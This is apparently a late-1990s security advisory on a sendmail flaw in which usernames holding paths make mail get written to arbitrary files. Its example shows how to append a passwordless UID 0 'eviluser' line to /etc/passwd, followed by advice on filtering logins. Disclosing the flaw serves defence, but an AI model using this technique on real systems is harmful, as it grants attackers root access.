COMMAND

    sendmail

SYSTEMS AFFECTED

    Most systems running the program above in the way described below

PROBLEM

    Duck  Vader  posted  the following.   It  seems  sendmail will readily
    write to a path in the  username as long as it doesn't  begin with
    a forward slash. A few quick examples:

        thePond:~# cat /etc/passwd | grep ../
        ../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
        thePond:~# ls -l /var/a
        -rw-------   1 ../../a  users           0 Nov 23 12:14 /var/a

        thePond:/var/spool# ls -ld atjobs
        drwxr-xr-x   2 root     root         1024 Nov 23 11:55 atjobs
        thePond:/var/spool# cat /etc/passwd | grep atjobs
        ../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
        thePond:/var/spool# ls -l
        total 16
        drwxr-xr-x   2 root     root         1024 Nov 23 11:55 BOGUS.EYF
        -rw-------   1 ../atjob users           0 Nov 23 12:20 atjobs

    Yes, you can precede the pathname with a forward slash.

        thePond:~# cat /etc/passwd | grep passwd
        /etc/passwd:*:515:100:tmp:/home/tmp:
        thePond:~# cat /etc/passwd
        root:*:0:0:root:/root:/bin/tcsh
        bin:*:1:1:bin:/bin:
        daemon:*:2:2:daemon:/sbin:
        [Edited out more passwords..]
        From root Tue Nov 25 20:44:00 1997
        To: /etc/passwd

        eviluser::0:0:Sendmail quirks:/root:/bin/tcsh

    This probably will not be a problem for the average user. However,
    BBSes and free  email services often  let the user  select his own
    username, and will add him  to /etc/passwd for email and  whatnot.
    If someone ran into  a site that did  this, he could just  specify
    his login as  /etc/passwd and write  himself a new  username, this
    time with UID:GID 0:0.

SOLUTION

    Filtering logins will do it: reject any  login that contains a slash
    (or anything other than  a plain alphanumeric name)  before it  ever
    reaches /etc/passwd.  Anonymous remailers and free email services that
    cannot filter login input should  check their /etc/passwd for  logins
    that look like paths and for extra UID 0 entries such as the one shown
    above.